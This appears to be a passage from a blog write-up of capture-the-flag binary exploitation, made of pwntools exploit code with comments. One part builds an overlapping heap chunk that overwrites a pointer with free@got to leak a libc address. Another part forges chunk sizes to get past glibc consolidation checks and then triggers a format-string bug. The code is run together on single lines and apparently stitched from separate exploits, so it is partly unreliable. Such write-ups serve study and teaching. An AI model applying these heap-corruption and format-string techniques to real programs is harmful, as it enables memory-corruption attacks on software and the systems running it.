# trigger heap 2's size to fastbin 0x40 # heap 2's content to fastbin 0x20
Create(0x30,p64(0)*4+p64(0x30)+p64(free_got)) # new heap 2's struct will point to old heap 2's content, size 0x20 # new heap 2's content will point to old heap 2's strcut, size 0x30 # that is to say we can overwrite new heap 2's struct # here we overwrite its heap content pointer to free@got(when we print, printf will print the loacation which free@got point to) size,content=Show(1) # 0x785040: 0x6161616161616161 0x0000000000000041 <== new chunk2's content # 0x785050: 0x0000000000000000 0x0000000000000000 # 0x785060: 0x0000000000000000 0x0000000000000000 <== new chunk2's size which was overwrite right now # 0x785070: 0x0000000000000030 0x0000000000602018 <== point to new shcunk2's size and content
deffmt(fmtstr, argv): log.info('step 1. chunk extend.') payload = fmtstr # fmtstr payload = payload.ljust(0x80, 'f') payload += p64(0) # order 2's prev_size payload += p64(0x151) # order 2's size --> fake large payload += '\x00' * 0x140# padding for fake chunk payload += p64(0x150) # fake chunk's next chunk's prev_size payload += p64( 0x21 ) # fake chunk's next chunk's size, bypass the check: !prev_inuse(nextchunk) payload += '\x00' * 0x10# padding for fake chunk's next chunk payload += p64(0x20) + p64( 0x21) # bypass the check: in order not to consolidate edit(1, payload) # modify order 2's chunk size to 0x140 gdb.attach(p) delete(2) # now, unsorted bin\'s head chunk size 0x140.
log.info('step 2. format vulnerability') # when submit, the overall order content is : # Order 1: order1 # Order 2: Order1: order1 # try to construct format parameter too payload = 'FFFFFFF' + argv submit(payload) p.recvuntil('2: Order 1: ')
You are welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them.